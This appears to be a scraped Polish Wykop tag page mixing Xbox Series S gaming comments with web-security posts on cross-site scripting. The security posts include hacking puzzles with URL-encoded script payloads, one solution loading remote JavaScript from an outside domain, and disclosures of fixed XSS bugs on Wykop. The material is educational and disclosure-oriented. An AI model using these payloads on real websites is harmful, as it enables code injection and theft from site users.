Wszystko
Najlepsze
Archiwum
Gierki od Codemasters wlecą niedługo do EA Play - Dirt 5, GRID i F1 2020.
#ps5 #ps4 #xbox #xsx #xboxseriesx #xss #xboxseries #eaplay #dirt5
#ps5 #ps4 #xbox #xsx #xboxseriesx #xss #xboxseries #eaplay #dirt5

@BlackFett Jak mówią soon to soon, nie trzeba im co pół roku powtarzać.
@Just_Doesnt_Know: f1 tak samo z psnow juz ogrywałem

- ofiaralosu
- starlight_92
- rozpendzonyjerz
- shaki24
- Ryhol
- +26 innych
@wykopowicz_ka: Series x na pewno lepiej sprawdza się jako broń niż konsola. W końcu na konsoli trzeba mieć w co grać. xD
- Maister37
- konto usunięte
- mrwhite0
- Cha13oy
- tester_rzeczy
- +11 innych
konto usunięte via Android
- 9
Komentarz usunięty przez autora
Jak w listopadzie tego roku #cyberpunk2077 wyjdzie na #ps5 i #xsx | #xss to zacznie się spuszczanie, jak przy #wiedzmin3 jaka ta gra jest niesamowita, gdyż #konsolowyplebs dowie się, że to nie gra była problemem tylko ich gówniany sprzęt, na którym ona działała ( ͡° ͜ʖ ͡°)
- 35
@wykopowicz_ka: nie będę zaskoczony gdy się okaże, że premiera next-gen pacza będzie jeszcze większym rozczarowaniem niż premiera podstawki w grudniu... ( ͡° ͜ʖ ͡°)
@wykopowicz_ka: Co ma sprzęt do wszechobecnych bugow i #!$%@? AI
- 5
- 5
- 50
( ͡° ͜ʖ ͡°) Podsumowując info z paru dni:
1. Jak jesteś biedny to i tak stać cię na Xboxa Series
2. Stać cię na wersję S bo kosztuje 1349 zł
3. Stać cię też na wersję X bo choć wyceniona jest na 2249 zł to w programie Xbox All Access można rozłożyć to na raty i w dodatku mieć Game Passa w tej opłacie.
4. I to
1. Jak jesteś biedny to i tak stać cię na Xboxa Series
2. Stać cię na wersję S bo kosztuje 1349 zł
3. Stać cię też na wersję X bo choć wyceniona jest na 2249 zł to w programie Xbox All Access można rozłożyć to na raty i w dodatku mieć Game Passa w tej opłacie.
4. I to
- Ethellon
- Koliat
- brzytwiarz
- AryanWonderBoi
- MarchwiowySok
- +45 innych
- 19
@kotwherbacie: No to kupisz Sony. Tutaj nie chodzi o to żeby się zmuszać. Niech każdy gra na czym chce. ʕ•ᴥ•ʔ
- Zachar87ck
- exomars
- plastic11
- drheist
- tomaszodg
- +14 innych
@kotwherbacie: Może Sony się zmusi o wypuści w końcu psnow w Polsce to sobie ogram ich exy i będę mógł mieć na nich wbite dalej. Polityka z exami gdzie to jedyny atut jest żenująca, Sony nie ma jakiejś super extra technologii dla której te gry nie poszłyby na xboxie czy pc
- RitmoXL
- Dekorum
- czyczepka
- konfucjuszanin
- silvaa76
- +4 innych
- 9
Zobaczcie jaką podatność znaleźliśmy w Gmailu. Pisał o tym ostatnio Forbes ;) czy sporo innych bardziej technicznych portali na zachodzi:
https://sekurak.pl/xss-w-amp4email-w-gmailu-wykorzystujac-dom-clobbering/
#sekurak #bezpieczenstwo #google #xss
https://sekurak.pl/xss-w-amp4email-w-gmailu-wykorzystujac-dom-clobbering/
#sekurak #bezpieczenstwo #google #xss

Z ciekawości ile nad tym siedzieliście? Próbujecie robić to w grupach np jeden dzień w tygodniu czy jak?
Kto chce zobaczyć XSSa na wykopie, niech wchodzi na mój profil - może to zmotywuje kogoś w supporcie by to naprawili. Plusiki mile widziane ( ͡° ͜ʖ ͡°)
@a__s, może Ty szepniesz tam komuś by sprawdzili czasami zgłoszenia w supporcie xD
#wykop #xss #davyjonespsujewykop <- to tak na zaś gdybym jeszcze coś złapał
@a__s, może Ty szepniesz tam komuś by sprawdzili czasami zgłoszenia w supporcie xD
#wykop #xss #davyjonespsujewykop <- to tak na zaś gdybym jeszcze coś złapał
- konto usunięte
- konto usunięte
- BigKrs
- nietopies
- deryt
- +4 innych
- 2
- 13
Reflected XSS na Wykopie.
Zgłoszony do administracji i usunięty w niecałe 24h.
#security #bezpieczenstwo #xss
Zgłoszony do administracji i usunięty w niecałe 24h.
#security #bezpieczenstwo #xss

- konto usunięte
- konto usunięte
- moooka
- maniac777
- Ziemeck
- +8 innych
- 1
@nehemiah: mozilla nie ogarnia
https://xss-game.appspot.com
Prosta gra stworzona przez #google ułatwiająca poznanie podstawowych błędów #xss
#programowanie #webdev #bezpieczenstwo #hacking
Prosta gra stworzona przez #google ułatwiająca poznanie podstawowych błędów #xss
#programowanie #webdev #bezpieczenstwo #hacking
- 4
#zagadkihakerskie #security #programowanie
Proponuję kolejną zagadkę hakerską, znów na tapetę bierzemy #xss. Pod adresem http://hakerium.cba.pl/zad8/ znajduje się strona z banalną podatnością typu XSS. Wystarczy wpisać dowolny tekst HTML i zostanie on wyświetlony na stronie, np. http://hakerium.cba.pl/zad8/?imie=%3Cscript%3Ealert%281%29%3C/script%3E
Na czym polega więc zagadka, skoro już podałem rozwiązanie? Ano na tym, że pole
jest ograniczone do 30 znaków. A zatem najprostszy
da radę wykonać, ale odrobinę bardziej skomplikowany
już nie: http://hakerium.cba.pl/zad8/?imie=%3Cscript%3Ealert%28document.domain%29%3C/script%3E
Proponuję kolejną zagadkę hakerską, znów na tapetę bierzemy #xss. Pod adresem http://hakerium.cba.pl/zad8/ znajduje się strona z banalną podatnością typu XSS. Wystarczy wpisać dowolny tekst HTML i zostanie on wyświetlony na stronie, np. http://hakerium.cba.pl/zad8/?imie=%3Cscript%3Ealert%281%29%3C/script%3E
Na czym polega więc zagadka, skoro już podałem rozwiązanie? Ano na tym, że pole
imie
jest ograniczone do 30 znaków. A zatem najprostszy
alert(1)
da radę wykonać, ale odrobinę bardziej skomplikowany
alert(document.domain)
już nie: http://hakerium.cba.pl/zad8/?imie=%3Cscript%3Ealert%28document.domain%29%3C/script%3E
- 1
@AleFermat: @rationalistic: @kavillock:
http://hakerium.cba.pl/zad8/?imie=%3Cscript+src%3D%22%2F%2Fkzlk.pl%2F%22%2F%3E
Jakby domena nie działała (przed chwilą zarejestrowałem) to dopiszcie sobie do pliku hosts:
http://hakerium.cba.pl/zad8/?imie=%3Cscript+src%3D%22%2F%2Fkzlk.pl%2F%22%2F%3E
Jakby domena nie działała (przed chwilą zarejestrowałem) to dopiszcie sobie do pliku hosts:
178.63.136.164 kzlk.pl
@koziolek: @rationalistic: OK, a więc rozwiązanie, o które mi chodziło:
Skorzystamy z tagu iframe i umieścimy XSS-owaną domenę wewnątrz tego iframe'a. Ze względu na same origin policy nie ma możliwości odwoływać się do jakichkolwiek atrybutów strony wewnątrz iframe'a, jeśli ta jest z innej domeny (z kilkoma wyjątkami, m.in.
, który tutaj akurat się nie przysłuży). Istnieje jednak pewien atrybut, na który poprzez iframe'a możemy mieć wpływ - jest nim
Skorzystamy z tagu iframe i umieścimy XSS-owaną domenę wewnątrz tego iframe'a. Ze względu na same origin policy nie ma możliwości odwoływać się do jakichkolwiek atrybutów strony wewnątrz iframe'a, jeśli ta jest z innej domeny (z kilkoma wyjątkami, m.in.
postMessage
, który tutaj akurat się nie przysłuży). Istnieje jednak pewien atrybut, na który poprzez iframe'a możemy mieć wpływ - jest nim
#security
Opowiem o ciekawym przypadku #xss, który znalazłem ostatnio na #wykop i został już naprawiony. Ciekawy jest dlatego, że nie tak łatwo go wyexploitować... Ale po kolei.
Podatność występowała na niektórych podstronach bezpośrednio w adresach. Gdy w adresie został umieszczony znak cudzysłowia, a następnie nawiasy ostre, można było wyjść z tagu i wprowadzić dowolny kod HTML. Przykład na screenie: http://i.imgur.com/ulCWnvo.png
Może się wydawać: no to jesteśmy w domu, mamy XSS-a! Praktyczne
Opowiem o ciekawym przypadku #xss, który znalazłem ostatnio na #wykop i został już naprawiony. Ciekawy jest dlatego, że nie tak łatwo go wyexploitować... Ale po kolei.
Podatność występowała na niektórych podstronach bezpośrednio w adresach. Gdy w adresie został umieszczony znak cudzysłowia, a następnie nawiasy ostre, można było wyjść z tagu i wprowadzić dowolny kod HTML. Przykład na screenie: http://i.imgur.com/ulCWnvo.png
Może się wydawać: no to jesteśmy w domu, mamy XSS-a! Praktyczne

- rss
- fledgeling
- snx
- Japuch
- eXtreme
- +12 innych
- 1
Czy po przez XSS można wgrać pliki na serwer lub odczytać pliki istniejące na komputerze?
#javascript #xss #hakujo
#javascript #xss #hakujo
57
Zawodowy hacker. Wywiad z pentesterem.

- 17
- #
- #
- #
- #
- #
- #
- #
#zagadkihakerskie #programowanie #xss #js #html
Ostatnio rzuciłem kolejne wyzwanie związane z bezpieczeństwem stron internetowych. Strona pod adresem http://hakerium.cba.pl/zad2/ jest podatna na błąd typu Cross-Site Scripting (XSS) i celem zadania było dołączenie pliku z zewnętrznej domeny. Zaproponowałem plik spod adresu http://pastebin.com/raw.php?i=mYM90ckz który po prostu wyświetla alert, ale oczywiście można go dużo bardziej rozwinąć.
Sama strona umożliwiała dodawanie komentarzy o długości co najwyżej 100 znaków. Zacznijmy od analizy jak ta strona działa i dlaczego
Ostatnio rzuciłem kolejne wyzwanie związane z bezpieczeństwem stron internetowych. Strona pod adresem http://hakerium.cba.pl/zad2/ jest podatna na błąd typu Cross-Site Scripting (XSS) i celem zadania było dołączenie pliku z zewnętrznej domeny. Zaproponowałem plik spod adresu http://pastebin.com/raw.php?i=mYM90ckz który po prostu wyświetla alert, ale oczywiście można go dużo bardziej rozwinąć.
Sama strona umożliwiała dodawanie komentarzy o długości co najwyżej 100 znaków. Zacznijmy od analizy jak ta strona działa i dlaczego
- Kaerl
- eDameXxX
- draqul
- aRth
- konto usunięte
- +15 innych
- 1
Ochrona przed zagrożeniem:
Błąd na tej stronie jest całkiem ciekawy, ponieważ strona enkoduje dane wyjściowe (tj. np. znak
jest zamieniany na
, a
jest zamieniany na
). Pomimo tego i tak udaje się znaleźć podatność i wykorzystać błąd. Wynika to z niedostosowania się do pewnych dobrych standardów w HTML-u. W tym przypadku wystarczyło atrybut wartość atrybutu
umieścić w cudzysłowach i błędu już by nie było. Wniosek jest
Błąd na tej stronie jest całkiem ciekawy, ponieważ strona enkoduje dane wyjściowe (tj. np. znak
<
jest zamieniany na
<
, a
"
jest zamieniany na
"
). Pomimo tego i tak udaje się znaleźć podatność i wykorzystać błąd. Wynika to z niedostosowania się do pewnych dobrych standardów w HTML-u. W tym przypadku wystarczyło atrybut wartość atrybutu
title
umieścić w cudzysłowach i błędu już by nie było. Wniosek jest
#programowanie #zagadkihakerskie #xss #html #js
Kolejna zagadka hakerska. Tym razem strona, na której można dodawać komentarze o długości co najwyżej 100 znaków, która jest podatna na XSS. Waszym zadaniem jest wykonać na stronie plik JS z zewnętrznej domeny (np. ten).
http://hakerium.cba.pl/zad2/
Zadanie chyba jest znacznie łatwiejsze niż poprzednio ;)
Kolejna zagadka hakerska. Tym razem strona, na której można dodawać komentarze o długości co najwyżej 100 znaków, która jest podatna na XSS. Waszym zadaniem jest wykonać na stronie plik JS z zewnętrznej domeny (np. ten).
http://hakerium.cba.pl/zad2/
Zadanie chyba jest znacznie łatwiejsze niż poprzednio ;)
Wygląda na to, że jest już poprawiony, stąd mogę wyjawić błąd XSS jaki był jeszcze wczoraj na wykopie:
http://screencast.com/t/DwBKlbJr
#wykop #xss
http://screencast.com/t/DwBKlbJr
#wykop #xss
@dyktek: Include zawsze przechodzi (jeśli starcza znaków na jego zrobienie), właściwie nie ma się jak przed tym zabezpieczyć.
Kwestia tego czy podgląd to jest to samo co właściwa publikacja jest nierozstrzygnięta przeze mnie, bo nie chciałem robić syfu na wykopalisku. Wydało mi się jednak mocno prawdopodobne, że jest dokładnie to samo, więc zgłosiłem błąd do Wykopu i dość szybko go naprawiono, więc chyba coś było na rzeczy :)
Kwestia tego czy podgląd to jest to samo co właściwa publikacja jest nierozstrzygnięta przeze mnie, bo nie chciałem robić syfu na wykopalisku. Wydało mi się jednak mocno prawdopodobne, że jest dokładnie to samo, więc zgłosiłem błąd do Wykopu i dość szybko go naprawiono, więc chyba coś było na rzeczy :)
46
Na wykopie też można przeprowadzić atak XSS
- 15
- #
- #
- #
- #
- #
- #
219
Wyczaiłem lukę XSS na Wyczaj.to
- 50
- #
- #
- #
- #
- #
- #
- #
- #
30
Odsiebie.com - Hacked!
- 18
- #
- #
- #
- #
- #
- #
- #
- #
175
NoScript - niecne praktyki twórców popularnego dodatku do Firefoksa
- 21
- #
- #
- #
- #
- #
- #
- #
- #
- #
- #
270
Jak główna strona MPAA stała się siedliskiem torrentów.
- 16
- #
- #
- #
- #
- #
- #
260
Dziurawy Wykop
- 41
- #
- #
- #
- #
Ja mam pytanie ws. tych gier ekskluzywnych na PS, ale do tego wrócę za chwilę.
Pytanie o monopol jest jak najbardziej potrzebne, ale tym bym się nie martwił za bardzo, a na pewno
@boguslaw-de-cubalibre: a co miało się stać ( ͡° ͜ʖ ͡°) z perspektywy rynku branży gier SONY dalej jest większe, niż Microsoft ¯\_(ツ)_/¯ ich konsole sprzedają się lepiej, do tego mają plan zrobić obok ps plusa coś na wzór xboxowego gamepassa, wejść we współpracę z netflixem, ogólnie sytuacja rozwojowa... co do exclusive'ów to one dalej będą, ale z czasem będą też
@boguslaw-de-cubalibre: tu jeszcze dodam tylko, że steam i ich polityka zwrotów są bezpośrednią przyczyną upadku twórców dobrze zapowiadających się indyków ( ͡° ͜ʖ ͡°) nie ma lepszego przykładu na to jak korporacja niszczy niezależnych twórców, weźmy na celownik